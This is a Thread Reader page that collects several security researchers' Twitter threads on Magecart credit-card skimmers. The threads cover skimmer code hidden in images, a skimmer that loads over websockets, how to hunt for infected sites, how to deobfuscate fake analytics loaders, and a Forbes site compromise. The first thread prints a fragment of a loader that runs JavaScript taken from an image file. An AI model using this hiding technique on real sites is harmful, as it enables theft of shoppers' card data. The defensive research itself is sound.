Discover and read the best of Twitter Threads about #magecart

Most recents (7)

New digital skimmer/#magecart technique: steganography

A colleague found this a couple of days ago while searching through our SIEM. The skimmer group uploads or modifies an existing image and appends the JS code.

Here's an example of a live image. You can load this image and prepend view-source: The next tweet has the code that loads and runs the code in this image. The full skimmer code is in a gist on the last tweet.


var xhr = new XMLHttpRequest();'GET', '<image>', true);
xhr.onreadystatechange = function() {
if (this.readyState != 4) return;
if (this.status == 200) {
var F=new Function (this.responseText.slice(-19704));

Read 6 tweets
I think I stumbled upon a novel digital skimmer/#magecart script still in development and figured I'd share all the code and (limited) infrastructure I've found so far. And I'll share the simple method to stop this technique dead (tweet 16 😉)

First, what makes it unique?

- Malicious payload is loaded over websockets
- Exfil over websockets
- A rather clever skimmer loader that I think may fool a lot of people
- CSS classes(!) being used to construct the URL

Intrigued? Great. Let's go

Let's look at the skimmer loader. Look like anything you're used to seeing? querySelector, className, Canvas ondraw? What in the world? Where's the script tag created?

Read 17 tweets
:: Magecart Hunting Thread ::

This is a thread about how to hunt and find #Magecart infected sites using @URLscan. 💰💵

♻️Please retweet to help spread knowledge and feel free to add your own techniques, ideas, and suggestions.

A brief overview of Magecart.

Magecart is an umbrella term for the technique of injecting JavaScript to steal credit card numbers on E-commerce sites. A number of actors/groups operate under the same term implanting JavaScript onto checkout pages all over the world.
To get started we need a foothold.
I have a hunt running looking for a known Magecart hash.

This morning a new site hit the search, looking at the site I then used the filename as a pivot. The filename which is infected with Magecart is "jquery_noconflict.js"
Read 15 tweets
Want to learn to hunt for some #magecart infrastructure? Then you've come to the right place. Going to walk you through how to do it, from the very start to the end. /thread (probably 30-35 tweets, so hope you're interested)
Just found a couple of domains that I haven't seen elsewhere, so if you stick through to the end you'll get to see newly discovered infrastructure. If you somehow knew of it already, let's talk, I'd be curious how you came upon them.
First, a disclaimer/ask: when you're doing this, you're going to find affected websites. There's lots and lots of them. Maybe don't name and shame the little guys? Takes about the same amount of time to send them a quick note as it does to highlight that they're affected.
Read 37 tweets
A week or so ago I broke down one #magecart loader, which was pretending to be Google Analytics -

Today, let's look at another version of this they use which purports to be Google Tag Manager. Most of this will look pretty similar to the GA version.
So here's the code we'll be looking at as you would see it on an infected website:…
and then here's the same thing prettified:…
Lines 3-14 in the prettified version look like they're doing something. If you look at Line 47 you can see the arguments passed into this anonymous function: window, document, 'script', 'dataLayer', 'GTM-WYRDH'. Lines 10-14 actually create a legit script tag, it's just never used
Read 10 tweets
Annoyed as hell with a certain company's abuse department, so let's examine one of these #magecart / digital skimming loader techniques. The goal here will be to figure out what script it's trying to load. A thread, or something 1/13
Here's a common technique from a group. They try to make it look like something for Google Analytics, but it's clearly not. So what is it doing?…

First, you'll notice some weird variable names: showArticle, textAside, openReader, firstDescription. 2/13
There's no meaning behind them, they're pretty random and are frequently changed. Pay little attention to them.

Let's clean up the code a little bit and see what's actually going on here. 3/13…
Read 13 tweets
@Forbes Magazine subscription website ( is infected with #magecart malware.

Exfil domain: fontsawesome[.]gq (🇧🇬)
@urlscanio results:…
Deobfuscated code:
@Forbes @urlscanio is back online and we've confirmed the malware has been removed.

If you made a purchase on the site while it was compromised, your credit card information was likely stolen.

@Forbes @urlscanio We've been receiving a lot of questions from reporters regarding this incident. Here's the timeline so far:
Read 7 tweets

Related hashtags

Did Thread Reader help you today?

Support us! We are indie developers!

This site is made by just three indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3.00/month or $30.00/year) and get exclusive features!

Become Premium

Too expensive? Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal Become our Patreon

Thank you for your support!